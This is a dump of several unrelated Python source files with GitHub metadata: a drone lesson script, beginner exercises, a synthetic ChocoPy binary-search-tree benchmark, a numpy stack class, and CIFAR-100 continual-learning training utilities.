05bafd9cd33150e356ee71cf5ec0c6d471a8fd8c | c6bd7a1a9d5b027f4ccb04228d30889058ed1186 | /MPH_conversion.py | 228529cc770bf0962d10abd9da1adf36c2e0d69a | [] | no_license | lukefrasera/unr_internship_project_01 | 421fdb50739e6299a23afe5d5ad0d7aec9260b36 | be82b67e8f78344da30cfd148a645538890bb5e9 | refs/heads/master | 2022-06-17T01:46:12.014121 | 2015-10-02T22:19:23 | 2015-10-02T22:19:23 | 261,266,974 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 39 | py | #!/usr/bin/env python
def main():
pass | [
"mirandakcross@gmail.com"
] | mirandakcross@gmail.com |
5adfbabc3629b9b8f698444d0bc44b08d4c24358 | ffcc9a3c8480b436df89063be1cbb4947b04ed40 | /guide/lesson3.py | 61706413801349822f497343f776184d915dde9c | [
"MIT"
] | permissive | TeaPackCZ/heidi | d37bd97708f0f5d3a3930ed01a3b0f4fc4411747 | 44c5fa7442e225aed6978a0decbdbcea3b33837e | refs/heads/master | 2021-01-17T04:51:27.257075 | 2015-06-09T04:00:45 | 2015-06-09T04:00:45 | 33,980,451 | 0 | 1 | null | 2015-04-15T07:49:13 | 2015-04-15T07:49:12 | null | UTF-8 | Python | false | false | 521 | py | """
Lesson 3 - logging examples
"""
import sys
sys.path.append('..') # access to drone source without installation
from ardrone2 import ARDrone2, ManualControlException
def testLesson3( drone ):
    # Take off and hover for 10 s; taking manual control aborts the hover
    # (ManualControlException).  The drone lands in both cases, then the
    # battery level is reported.  Python 2 except/print syntax.
    try:
        drone.takeoff()
        drone.hover(10.0)
    except ManualControlException, e:
        print "ManualControlException"
    drone.land()
    print "Battery", drone.battery
if __name__ == "__main__":
    # launcher parses the command line and wires the drone to the test routine
    import launcher
    launcher.launch( sys.argv, ARDrone2, testLesson3 )
# vim: expandtab sw=4 ts=4
| [
"martind@mapfactor.com"
] | martind@mapfactor.com |
e6eeb16088bc7aa7f078ef1eff1925877e565e54 | 54e5d550eeb7664f8426cb2429a443680b70f890 | /CH06/Whileture.py | 304526403a9da8ac67690ad6d43b368e8fd480e9 | [] | no_license | Choiseokjoon/HelloPython | c2cb53a0b2c98f01cd6aa9fc6cd712a420d6b39e | da9ad39bb5dc31c99718f1b009c7ef845cc0a964 | refs/heads/master | 2020-05-15T17:30:34.585815 | 2019-04-20T13:01:31 | 2019-04-20T13:01:31 | 182,406,168 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 143 | py | sum_all = 0
num = 0
# Prints "1" every pass while accumulating 0+1+2+... (sum_all starts at 0
# above); the loop exits once the running total reaches 50.
while True:
    print("1")
    if sum_all >=50 :
        break
    sum_all = sum_all +num
    num = num + 1
| [
"noreply@github.com"
] | noreply@github.com |
199d434465c3656aee4f794b9c3e45082973e134 | c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c | /cases/synthetic/tree-big-7896.py | b9db85cffe8ae7ce8835bf3307e75b65eb9792ec | [] | no_license | Virtlink/ccbench-chocopy | c3f7f6af6349aff6503196f727ef89f210a1eac8 | c7efae43bf32696ee2b2ee781bdfe4f7730dec3f | refs/heads/main | 2023-04-07T15:07:12.464038 | 2022-02-03T15:42:39 | 2022-02-03T15:42:39 | 451,969,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,291 | py | # Binary-search trees
class TreeNode(object):
    # One node of a binary-search tree: values smaller than `value` live in
    # the left subtree, larger ones in the right.
    value:int = 0
    left:"TreeNode" = None
    right:"TreeNode" = None
    def insert(self:"TreeNode", x:int) -> bool:
        # Add x below this node; True iff a fresh node was created.
        if x < self.value:
            if self.left is None:
                self.left = makeNode(x)
                return True
            return self.left.insert(x)
        if x > self.value:
            if self.right is None:
                self.right = makeNode(x)
                return True
            return self.right.insert(x)
        # duplicate: nothing inserted
        return False
    def contains(self:"TreeNode", x:int) -> bool:
        # Standard BST membership test.
        if x == self.value:
            return True
        if x < self.value:
            return False if self.left is None else self.left.contains(x)
        return False if self.right is None else self.right.contains(x)
class TreeNode2(object):
    # BST node with one spare copy of every field (synthetic benchmark shape);
    # only value/left/right participate in the tree logic.
    value:int = 0
    value2:int = 0
    left:"TreeNode2" = None
    left2:"TreeNode2" = None
    right:"TreeNode2" = None
    right2:"TreeNode2" = None
    def insert(self:"TreeNode2", x:int) -> bool:
        # Add x below this node; True iff a fresh node was created.
        if x < self.value:
            if self.left is None:
                self.left = makeNode2(x, x)
                return True
            return self.left.insert(x)
        if x > self.value:
            if self.right is None:
                self.right = makeNode2(x, x)
                return True
            return self.right.insert(x)
        return False
    def insert2(self:"TreeNode2", x:int, x2:int) -> bool:
        # Byte-wise identical to insert in the original; x2 is ignored.
        return self.insert(x)
    def contains(self:"TreeNode2", x:int) -> bool:
        # Standard BST membership test.
        if x == self.value:
            return True
        if x < self.value:
            return False if self.left is None else self.left.contains(x)
        return False if self.right is None else self.right.contains(x)
    def contains2(self:"TreeNode2", x:int, x2:int) -> bool:
        # Same as contains; x2 is ignored.
        return self.contains(x)
class TreeNode3(object):
    # BST node with two spare copies of every field (synthetic benchmark
    # shape); only value/left/right participate in the tree logic.
    value:int = 0
    value2:int = 0
    value3:int = 0
    left:"TreeNode3" = None
    left2:"TreeNode3" = None
    left3:"TreeNode3" = None
    right:"TreeNode3" = None
    right2:"TreeNode3" = None
    right3:"TreeNode3" = None
    def insert(self:"TreeNode3", x:int) -> bool:
        # Add x below this node; True iff a fresh node was created.
        if x < self.value:
            if self.left is None:
                self.left = makeNode3(x, x, x)
                return True
            return self.left.insert(x)
        if x > self.value:
            if self.right is None:
                self.right = makeNode3(x, x, x)
                return True
            return self.right.insert(x)
        return False
    def insert2(self:"TreeNode3", x:int, x2:int) -> bool:
        # Byte-wise identical to insert in the original; extras ignored.
        return self.insert(x)
    def insert3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool:
        # Byte-wise identical to insert in the original; extras ignored.
        return self.insert(x)
    def contains(self:"TreeNode3", x:int) -> bool:
        # Standard BST membership test.
        if x == self.value:
            return True
        if x < self.value:
            return False if self.left is None else self.left.contains(x)
        return False if self.right is None else self.right.contains(x)
    def contains2(self:"TreeNode3", x:int, x2:int) -> bool:
        # Same as contains; extras ignored.
        return self.contains(x)
    def contains3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool:
        # Same as contains; extras ignored.
        return self.contains(x)
class TreeNode4(object):
    # BST node with three spare copies of every field (synthetic benchmark
    # shape); only value/left/right participate in the tree logic.
    value:int = 0
    value2:int = 0
    value3:int = 0
    value4:int = 0
    left:"TreeNode4" = None
    left2:"TreeNode4" = None
    left3:"TreeNode4" = None
    left4:"TreeNode4" = None
    right:"TreeNode4" = None
    right2:"TreeNode4" = None
    right3:"TreeNode4" = None
    right4:"TreeNode4" = None
    def insert(self:"TreeNode4", x:int) -> bool:
        # Add x below this node; True iff a fresh node was created.
        if x < self.value:
            if self.left is None:
                self.left = makeNode4(x, x, x, x)
                return True
            return self.left.insert(x)
        if x > self.value:
            if self.right is None:
                self.right = makeNode4(x, x, x, x)
                return True
            return self.right.insert(x)
        return False
    def insert2(self:"TreeNode4", x:int, x2:int) -> bool:
        # Byte-wise identical to insert in the original; extras ignored.
        return self.insert(x)
    def insert3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool:
        # Byte-wise identical to insert in the original; extras ignored.
        return self.insert(x)
    def insert4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool:
        # Byte-wise identical to insert in the original; extras ignored.
        return self.insert(x)
    def contains(self:"TreeNode4", x:int) -> bool:
        # Standard BST membership test.
        if x == self.value:
            return True
        if x < self.value:
            return False if self.left is None else self.left.contains(x)
        return False if self.right is None else self.right.contains(x)
    def contains2(self:"TreeNode4", x:int, x2:int) -> bool:
        # Same as contains; extras ignored.
        return self.contains(x)
    def contains3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool:
        # Same as contains; extras ignored.
        return self.contains(x)
    def contains4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool:
        # Same as contains; extras ignored.
        return self.contains(x)
class TreeNode5(object):
    # BST node with four spare copies of every field (synthetic benchmark
    # shape); only value/left/right participate in the tree logic.
    value:int = 0
    value2:int = 0
    value3:int = 0
    value4:int = 0
    value5:int = 0
    left:"TreeNode5" = None
    left2:"TreeNode5" = None
    left3:"TreeNode5" = None
    left4:"TreeNode5" = None
    left5:"TreeNode5" = None
    right:"TreeNode5" = None
    right2:"TreeNode5" = None
    right3:"TreeNode5" = None
    right4:"TreeNode5" = None
    right5:"TreeNode5" = None
    def insert(self:"TreeNode5", x:int) -> bool:
        # Add x below this node; True iff a fresh node was created.
        if x < self.value:
            if self.left is None:
                self.left = makeNode5(x, x, x, x, x)
                return True
            return self.left.insert(x)
        if x > self.value:
            if self.right is None:
                self.right = makeNode5(x, x, x, x, x)
                return True
            return self.right.insert(x)
        return False
    def insert2(self:"TreeNode5", x:int, x2:int) -> bool:
        # Byte-wise identical to insert in the original; extras ignored.
        return self.insert(x)
    def insert3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool:
        # Byte-wise identical to insert in the original; extras ignored.
        return self.insert(x)
    def insert4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool:
        # Byte-wise identical to insert in the original; extras ignored.
        return self.insert(x)
    def insert5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
        # Byte-wise identical to insert in the original; extras ignored.
        return self.insert(x)
    def contains(self:"TreeNode5", x:int) -> bool:
        # Standard BST membership test.
        if x == self.value:
            return True
        if x < self.value:
            return False if self.left is None else self.left.contains(x)
        return False if self.right is None else self.right.contains(x)
    def contains2(self:"TreeNode5", x:int, x2:int) -> bool:
        # Same as contains; extras ignored.
        return self.contains(x)
    def contains3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool:
        # Same as contains; extras ignored.
        return self.contains(x)
    def contains4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool:
        # Same as contains; extras ignored.
        return self.contains(x)
    def contains5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
        # Same as contains; extras ignored.
        return self.contains(x)
class Tree(object):
    # BST wrapper tracking the root node and the number of distinct values.
    root:TreeNode = None
    size:int = 0
    def insert(self:"Tree", x:int) -> object:
        # Insert x; size grows only when x was not already present.
        if self.root is None:
            self.root = makeNode(x)
            self.size = 1
        elif self.root.insert(x):
            self.size = self.size + 1
    def contains(self:"Tree", x:int) -> bool:
        # Membership test; an empty tree contains nothing.
        return False if self.root is None else self.root.contains(x)
class Tree2(object):
    # BST wrapper with one spare copy of each field (synthetic benchmark
    # shape); only root/size participate in the tree logic.
    root:TreeNode2 = None
    root2:TreeNode2 = None
    size:int = 0
    size2:int = 0
    def insert(self:"Tree2", x:int) -> object:
        # Insert x; size grows only when x was not already present.
        if self.root is None:
            self.root = makeNode2(x, x)
            self.size = 1
        elif self.root.insert(x):
            self.size = self.size + 1
    def insert2(self:"Tree2", x:int, x2:int) -> object:
        # Byte-wise identical to insert in the original; x2 is ignored.
        return self.insert(x)
    def contains(self:"Tree2", x:int) -> bool:
        # Membership test; an empty tree contains nothing.
        return False if self.root is None else self.root.contains(x)
    def contains2(self:"Tree2", x:int, x2:int) -> bool:
        # Same as contains; x2 is ignored.
        return self.contains(x)
class Tree3(object):
    # Generated benchmark variant of Tree. Only root/size are ever touched;
    # the numbered extras and surplus parameters are padding.
    root:TreeNode3 = None
    root2:TreeNode3 = None
    root3:TreeNode3 = None
    size:int = 0
    size2:int = 0
    size3:int = 0
    def insert(self:"Tree3", x:int) -> object:
        if self.root is None:
            self.root = makeNode3(x, x, x)
            self.size = 1
        elif self.root.insert(x):
            self.size = self.size + 1
    def insert2(self:"Tree3", x:int, x2:int) -> object:
        # Behaves exactly like insert; x2 is ignored.
        if self.root is None:
            self.root = makeNode3(x, x, x)
            self.size = 1
        elif self.root.insert(x):
            self.size = self.size + 1
    def insert3(self:"Tree3", x:int, x2:int, x3:int) -> object:
        # Behaves exactly like insert; x2 and x3 are ignored.
        if self.root is None:
            self.root = makeNode3(x, x, x)
            self.size = 1
        elif self.root.insert(x):
            self.size = self.size + 1
    def contains(self:"Tree3", x:int) -> bool:
        if self.root is None:
            return False
        return self.root.contains(x)
    def contains2(self:"Tree3", x:int, x2:int) -> bool:
        # Behaves exactly like contains; x2 is ignored.
        if self.root is None:
            return False
        return self.root.contains(x)
    def contains3(self:"Tree3", x:int, x2:int, x3:int) -> bool:
        # Behaves exactly like contains; x2 and x3 are ignored.
        if self.root is None:
            return False
        return self.root.contains(x)
class Tree4(object):
    # Generated benchmark variant of Tree. Only root/size are ever touched;
    # the numbered extras and surplus parameters are padding.
    root:TreeNode4 = None
    root2:TreeNode4 = None
    root3:TreeNode4 = None
    root4:TreeNode4 = None
    size:int = 0
    size2:int = 0
    size3:int = 0
    size4:int = 0
    def insert(self:"Tree4", x:int) -> object:
        if self.root is None:
            self.root = makeNode4(x, x, x, x)
            self.size = 1
        elif self.root.insert(x):
            self.size = self.size + 1
    def insert2(self:"Tree4", x:int, x2:int) -> object:
        # Behaves exactly like insert; the extra parameters are ignored.
        if self.root is None:
            self.root = makeNode4(x, x, x, x)
            self.size = 1
        elif self.root.insert(x):
            self.size = self.size + 1
    def insert3(self:"Tree4", x:int, x2:int, x3:int) -> object:
        # Behaves exactly like insert; the extra parameters are ignored.
        if self.root is None:
            self.root = makeNode4(x, x, x, x)
            self.size = 1
        elif self.root.insert(x):
            self.size = self.size + 1
    def insert4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> object:
        # Behaves exactly like insert; the extra parameters are ignored.
        if self.root is None:
            self.root = makeNode4(x, x, x, x)
            self.size = 1
        elif self.root.insert(x):
            self.size = self.size + 1
    def contains(self:"Tree4", x:int) -> bool:
        if self.root is None:
            return False
        return self.root.contains(x)
    def contains2(self:"Tree4", x:int, x2:int) -> bool:
        # Behaves exactly like contains; the extra parameters are ignored.
        if self.root is None:
            return False
        return self.root.contains(x)
    def contains3(self:"Tree4", x:int, x2:int, x3:int) -> bool:
        # Behaves exactly like contains; the extra parameters are ignored.
        if self.root is None:
            return False
        return self.root.contains(x)
    def contains4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> bool:
        # Behaves exactly like contains; the extra parameters are ignored.
        if self.root is None:
            return False
        return self.root.contains(x)
class Tree5(object):
    # Generated benchmark variant of Tree with five padded copies of each
    # field and method. Only root/size are ever touched; the numbered extras
    # and the surplus parameters (x2..x5) are ignored by every method body.
    root:TreeNode5 = None
    root2:TreeNode5 = None
    root3:TreeNode5 = None
    root4:TreeNode5 = None
    root5:TreeNode5 = None
    size:int = 0
    size2:int = 0
    size3:int = 0
    size4:int = 0
    size5:int = 0
    def insert(self:"Tree5", x:int) -> object:
        if self.root is None:
            self.root = makeNode5(x, x, x, x, x)
            self.size = 1
        elif self.root.insert(x):
            self.size = self.size + 1
    def insert2(self:"Tree5", x:int, x2:int) -> object:
        # Behaves exactly like insert; the extra parameters are ignored.
        if self.root is None:
            self.root = makeNode5(x, x, x, x, x)
            self.size = 1
        elif self.root.insert(x):
            self.size = self.size + 1
    def insert3(self:"Tree5", x:int, x2:int, x3:int) -> object:
        # Behaves exactly like insert; the extra parameters are ignored.
        if self.root is None:
            self.root = makeNode5(x, x, x, x, x)
            self.size = 1
        elif self.root.insert(x):
            self.size = self.size + 1
    def insert4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> object:
        # Behaves exactly like insert; the extra parameters are ignored.
        if self.root is None:
            self.root = makeNode5(x, x, x, x, x)
            self.size = 1
        elif self.root.insert(x):
            self.size = self.size + 1
    def insert5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> object:
        # Behaves exactly like insert; the extra parameters are ignored.
        if self.root is None:
            self.root = makeNode5(x, x, x, x, x)
            self.size = 1
        elif self.root.insert(x):
            self.size = self.size + 1
    def contains(self:"Tree5", x:int) -> bool:
        if self.root is None:
            return False
        return self.root.contains(x)
    def contains2(self:"Tree5", x:int, x2:int) -> bool:
        # Behaves exactly like contains; the extra parameters are ignored.
        if self.root is None:
            return False
        return self.root.contains(x)
    def contains3(self:"Tree5", x:int, x2:int, x3:int) -> bool:
        # Behaves exactly like contains; the extra parameters are ignored.
        if self.root is None:
            return False
        return self.root.contains(x)
    def contains4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> bool:
        # Behaves exactly like contains; the extra parameters are ignored.
        if self.root is None:
            return False
        return self.root.contains(x)
    def contains5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
        # Behaves exactly like contains; the extra parameters are ignored.
        if self.root is None:
            return False
        return self.root.contains(x)
# Allocate a fresh leaf TreeNode holding x.
def makeNode(x: int) -> TreeNode:
    node:TreeNode = None
    node = TreeNode()
    node.value = x
    return node
# Allocate a fresh leaf TreeNode2 holding x. The extra parameter x2 belongs
# to the generated benchmark signature and is intentionally unused.
def makeNode2(x: int, x2: int) -> TreeNode2:
    # The unused local declaration b2 was removed: it was never read.
    b:TreeNode2 = None
    b = TreeNode2()
    b.value = x
    return b
# Allocate a fresh leaf TreeNode3 holding x. The extra parameters x2/x3
# belong to the generated benchmark signature and are intentionally unused.
def makeNode3(x: int, x2: int, x3: int) -> TreeNode3:
    # The unused local declarations b2/b3 were removed: they were never read.
    b:TreeNode3 = None
    b = TreeNode3()
    b.value = x
    return b
# Allocate a fresh leaf TreeNode4 holding x. The extra parameters x2..x4
# belong to the generated benchmark signature and are intentionally unused.
# Fix: the annotation of x3 was the invalid placeholder token `$Type`, which
# is a syntax error; every sibling makeNode* declares its parameters as int.
def makeNode4(x: int, x2: int, x3: int, x4: int) -> TreeNode4:
    # The unused local declarations b2..b4 were removed: they were never read.
    b:TreeNode4 = None
    b = TreeNode4()
    b.value = x
    return b
# Allocate a fresh leaf TreeNode5 holding x. The extra parameters x2..x5
# belong to the generated benchmark signature and are intentionally unused.
def makeNode5(x: int, x2: int, x3: int, x4: int, x5: int) -> TreeNode5:
    # The unused local declarations b2..b5 were removed: they were never read.
    b:TreeNode5 = None
    b = TreeNode5()
    b.value = x
    return b
# Input parameters
# NOTE(review): the *2..*5 copies below mirror n/c/t/i/k but are never read
# in this part of the file -- they appear to be generated benchmark padding;
# confirm before removing.
n:int = 100
n2:int = 100
n3:int = 100
n4:int = 100
n5:int = 100
c:int = 4
c2:int = 4
c3:int = 4
c4:int = 4
c5:int = 4
# Data
t:Tree = None
t2:Tree = None
t3:Tree = None
t4:Tree = None
t5:Tree = None
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
k:int = 37813
k2:int = 37813
k3:int = 37813
k4:int = 37813
k5:int = 37813
# Crunch
# Insert n pseudo-random keys (multiplicative congruential sequence
# k -> k*37813 mod 37831) plus most loop indices, then print the resulting
# tree size and probe a handful of fixed keys.
t = Tree()
while i < n:
    t.insert(k)
    k = (k * 37813) % 37831
    # Skip every c-th index so only some small keys are inserted.
    if i % c != 0:
        t.insert(i)
    i = i + 1
print(t.size)
for i in [4, 8, 15, 16, 23, 42]:
    if t.contains(i):
        print(i)
| [
"647530+Virtlink@users.noreply.github.com"
] | 647530+Virtlink@users.noreply.github.com |
02e18c7b8a4c3ab41fd01dd0fb8e3fd20ee6d3f1 | 9949376205f2617d60fb49ad948da79e7bb1ec87 | /clas.py | 3e718e73d3cc4e7aa39604d259e0a42e343fc15d | [] | no_license | Creeper315/Suduko-Solver | 5dbff7432aa418c26dba4891ca8426984a6081b4 | ca05e3d03b47d3a93e279ac95cda9dfc26a25838 | refs/heads/main | 2023-02-24T10:00:43.382702 | 2021-01-27T04:40:01 | 2021-01-27T04:40:01 | 333,304,790 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,003 | py | import numpy as np
class Stack:
    """LIFO stack of 2-D integer positions stored as an (n, 2) numpy array."""

    def __init__(self):
        # dtype must be int: positions are later used as array indices, and
        # float values cannot index arrays.
        self.value = np.empty((0, 2), dtype=int)

    def add(self, position):
        """Push a (row, col) position onto the stack."""
        self.value = np.concatenate((self.value, np.array([position])), axis=0)

    def pop(self):
        """Remove and return the most recently added position."""
        r = self.value[-1]
        self.value = self.value[0:-1]
        return r

    def current(self):
        """Return the top position without removing it."""
        return self.value[-1]

    def length(self):
        """Return the number of stored positions."""
        return len(self.value)

    def contain(self, position):
        """Return True if `position` is anywhere in the stack.

        Vectorized (row-wise equality + any) instead of the previous
        Python-level loop over rows; also correct for an empty stack.
        """
        return bool(np.any(np.all(self.value == np.asarray(position), axis=1)))
if __name__ == '__main__':
    # NOTE(review): the triple-quoted block below is commented-out demo code.
    # It is parsed as a bare string expression, so running this module as a
    # script is a no-op.
    '''s = Stack()
    print(s.value)
    s.add([1,2])
    s.add([4,5])
    s.add([9,10])
    print(s.value)
    print(s.value[0])
    print(s.value)
    print(s.contain([3,5]))
    print(s.current()[0])'''
| [
"noreply@github.com"
] | noreply@github.com |
385e7002048051f5d77a795985a595ead6f1bcb0 | 221c5a5769e84e5ba99320fd2db17152c6354919 | /py_basics_problems/reverse_sentense_s1.py | f401070558b7751a458d4b8d043db26991c70351 | [] | no_license | saradaprasad/py | 9727e7cf8c1fb1a6aef665bfde9483a212224776 | d5ad5a80de43c9ee0a73d870d468151275123ee2 | refs/heads/main | 2023-07-07T16:33:22.949182 | 2021-08-11T14:51:45 | 2021-08-11T14:51:45 | 380,809,666 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 181 | py | def reversed_words():
sentence='Python is exciting!'
words=sentence.split(' ');
reverse_sentence=' '.join(reversed(words))
print(reverse_sentence)
reversed_words() | [
"prasadsarada7@gmail.com"
] | prasadsarada7@gmail.com |
b478bc94e0a6fd66283bbc040deba2068d2a0e0d | 0c78aaaaad898d8076d30b0c6a3178ba49e7e833 | /utils.py | e50ce33c70253b2058b91ba2f05cd685594f313b | [
"MIT"
] | permissive | orgilj/cifar_continual_learning | d94a1da634e32627acc86b77009fb2d23d8dd88d | 4bbdbb38dbf3a2c85edbc08d59d1ef1fe90b7037 | refs/heads/main | 2023-02-23T13:38:41.472750 | 2021-01-29T15:24:02 | 2021-01-29T15:24:02 | 334,178,731 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,693 | py | import numpy as np
import torch
import torchvision
from tqdm import tqdm
def get_split_cifar100(task_id, start_class=None, end_class=None, batch_size=32, shuffle=False):
    """Return (train_loader, test_loader) for one 5-class split of CIFAR-100.

    Convention: tasks are numbered from 1, not 0, so task_id=1 covers
    classes [0, 5), task_id=2 covers [5, 10), and so on. Explicit
    start_class/end_class override the task_id-derived bound(s).

    Args:
        task_id: 1-based task index used to derive the class range.
        start_class: first class, inclusive; derived from task_id if None.
        end_class: last class, exclusive; derived from task_id if None.
        batch_size: training batch size (the test loader uses batch_size // 2).
        shuffle: whether the training loader reshuffles each epoch.
    """
    # Fill in whichever bound is missing individually. Previously end_class
    # was only derived when start_class was None, so a caller supplying only
    # start_class crashed comparing tensors against None below.
    if start_class is None:
        start_class = (task_id - 1) * 5
    if end_class is None:
        end_class = task_id * 5
    CIFAR100_TRAIN_MEAN = (0.5070751592371323, 0.48654887331495095, 0.4409178433670343)
    CIFAR100_TRAIN_STD = (0.2673342858792401, 0.2564384629170883, 0.27615047132568404)
    transforms = torchvision.transforms.Compose([
        torchvision.transforms.RandomCrop(32, padding=4),
        torchvision.transforms.RandomHorizontalFlip(),
        torchvision.transforms.RandomRotation(15),
        torchvision.transforms.ToTensor(),
        torchvision.transforms.Normalize(CIFAR100_TRAIN_MEAN, CIFAR100_TRAIN_STD),
    ])
    train = torchvision.datasets.CIFAR100('./data/', train=True, download=True, transform=transforms)
    test = torchvision.datasets.CIFAR100('./data/', train=False, download=True, transform=transforms)
    # Boolean masks selecting only the samples whose label falls in the task range.
    targets_train = torch.tensor(train.targets)
    target_train_idx = ((targets_train >= start_class) & (targets_train < end_class))
    targets_test = torch.tensor(test.targets)
    target_test_idx = ((targets_test >= start_class) & (targets_test < end_class))
    # Fix: the `shuffle` argument was accepted but never forwarded; pass it to
    # the training loader (default False preserves the old behavior).
    train_loader = torch.utils.data.DataLoader(
        torch.utils.data.dataset.Subset(train, np.where(target_train_idx == 1)[0]),
        batch_size=batch_size, shuffle=shuffle)
    test_loader = torch.utils.data.DataLoader(
        torch.utils.data.dataset.Subset(test, np.where(target_test_idx == 1)[0]),
        batch_size=batch_size // 2)
    return train_loader, test_loader
def train(model, train_loader, test_loader, train_scheduler, optimizer, loss_fn, mask, opt):
    """Train `model` for opt.train_epochs epochs, periodically evaluating.

    If `mask` is a tensor, the gradients of the masked entries of the final
    layer's weight are zeroed after backward(), freezing those weights
    (continual-learning style protection of earlier tasks).

    Args:
        model: network with a final linear layer at `model.fc`.
        train_loader / test_loader: iterables of (image, target) batches.
        train_scheduler: LR scheduler stepped once per epoch.
        optimizer: optimizer over model parameters.
        loss_fn: criterion taking (output, target).
        mask: boolean index tensor into model.fc.weight, or a non-tensor to disable.
        opt: options namespace providing device, train_epochs and test_freq.
    """
    for epoch in range(opt.train_epochs):
        model.train()
        correct = 0.0
        total = 0.0
        pbar = tqdm(train_loader)
        for image, target in pbar:
            image, target = image.to(opt.device), target.to(opt.device)
            optimizer.zero_grad()
            output = model(image)
            loss = loss_fn(output, target)
            loss.backward()
            if torch.is_tensor(mask):
                # Zero the gradients of protected weights so optimizer.step()
                # leaves them untouched; done under no_grad to avoid tracking.
                with torch.no_grad():
                    model.fc.weight.grad[mask] = 0.0
            optimizer.step()
            _, preds = output.max(1)
            correct += preds.eq(target).sum()
            total += target.shape[0]
            pbar.set_description(
                'Epoch: %s, Train accuracy: %f, Loss: %f' % (str(epoch), (correct / total).item(), loss.item()))
        pbar.close()
        if epoch % opt.test_freq == 0:
            test(model, test_loader, opt)
        train_scheduler.step()
def test(model, test_loader, opt):
    """Evaluate `model` on `test_loader` and return its top-1 accuracy.

    Runs under torch.no_grad(): evaluation needs no autograd graph, and
    previously gradients were tracked needlessly, wasting memory.

    Args:
        model: network to evaluate.
        test_loader: iterable of (image, target) batches.
        opt: options namespace providing `device`.

    Returns:
        float: fraction of correctly classified samples.
    """
    model.eval()
    correct = 0.0
    total = 0.0
    pbar = tqdm(test_loader)
    with torch.no_grad():
        for image, target in pbar:
            image, target = image.to(opt.device), target.to(opt.device)
            output = model(image)
            _, preds = output.max(1)
            correct += preds.eq(target).sum()
            total += target.shape[0]
            accuracy = (correct / total).item()
            pbar.set_description('Test accuracy: %f' % accuracy)
    pbar.close()
    return (correct / total).item()
def update_mask(model, opt, old_mask=None):
    """Zero out "released" weights of model.fc and build a trainability mask.

    When `old_mask` is not a tensor: selects weights that are neither close to
    the maximum nor close to the minimum (thresholds from opt.zero_threshold),
    zeroes them, and returns the mask of released entries.

    NOTE(review): the `old_mask` tensor branch is unfinished (see the TODOs):
    it computes views of the old/new task weights but never assigns `mask`,
    so the final `return` raises NameError in that case. Confirm the intended
    behavior before calling with a tensor old_mask.
    """
    model.cpu()
    if not torch.is_tensor(old_mask):
        with torch.no_grad():
            new = model.fc.weight.cpu().numpy()
            print(torch.histc(model.fc.weight.data, bins=20, min=-1.0, max=1.0))
            # Released = not near the max (upper band) and not near the min
            # (lower band, a third of the threshold wide).
            mask = (new <= (new.max() - opt.zero_threshold)) & (new >= (new.min() + opt.zero_threshold / 3))
            print('New mask thresholding range: [', new.min() + opt.zero_threshold / 3, ',',
                new.max() - opt.zero_threshold, '], Number of weights released:', mask.sum())
            new[mask] = 0.0
            model.fc.weight.data = torch.tensor(new)
    else:
        h, w = old_mask.shape
        with torch.no_grad():
            new = model.fc.weight.cpu()
            # Partition the grown fc weight into the old-task block and the
            # newly added block; nothing is written back yet.
            new_task_weight = new[h:, w:]
            old_task_weight = new[:h, :w]
            old_task_trainable = old_task_weight[old_mask]
            # TODO update old mask
            # TODO update new task
    return model.to(opt.device), mask
def add_task(model, task_id, opt, classes_per_task=5):
    """Grow model.fc to task_id * classes_per_task outputs, keeping old rows.

    The weight and bias rows of previously learned classes are copied into
    the enlarged linear layer; the rows for the new task keep nn.Linear's
    fresh random initialization. The layer is rebuilt on CPU, then the model
    is moved back to opt.device.

    Args:
        model: network whose classifier head is `model.fc` (an nn.Linear).
        task_id: 1-based index of the task being added.
        opt: options namespace providing `device`.
        classes_per_task: classes added per task; default 5 keeps the
            previous hard-coded behavior (matching the 5-class CIFAR splits).

    Returns:
        The same model instance with the enlarged classifier head.
    """
    model.cpu()
    with torch.no_grad():
        old_weights, old_bias = model.fc.weight.data, model.fc.bias.data
        model.fc = torch.nn.Linear(model.fc.in_features, task_id * classes_per_task)
        n_old = (task_id - 1) * classes_per_task
        model.fc.weight.data[:n_old, :], model.fc.bias.data[:n_old] = old_weights, old_bias
    # After adding a task the model should be retrained until it reaches the
    # desired test accuracy threshold.
    model.to(opt.device)
    return model
def train_calib(model_calib, train_loader, test_loader, optimizer, loss_fn, opt):
    """Attempt to optimize a calibration model toward accuracy 1.0.

    NOTE(review): this function looks unfinished/broken; confirm intent:
      * it evaluates the global `model`, not the `model_calib` argument;
      * test() returns a plain Python float, so `loss_fn(pred_model_accuracy,
        target_calib)` receives a non-tensor and no gradient can flow from it;
      * optimizer.zero_grad() is never called, so gradients accumulate;
      * torch.autograd.Variable is deprecated, and calling .to(device) on it
        produces a non-leaf tensor.
    """
    model_calib.to(opt.device)
    target_calib = torch.autograd.Variable(torch.tensor([1.0]), requires_grad=True).to(opt.device)
    for i in range(10):
        pred_model_accuracy = test(model, test_loader, opt)
        loss = loss_fn(pred_model_accuracy, target_calib)
        print('loss: ', loss.item())
        loss.backward()
        optimizer.step()
"toorgil2012@gmail.com"
] | toorgil2012@gmail.com |
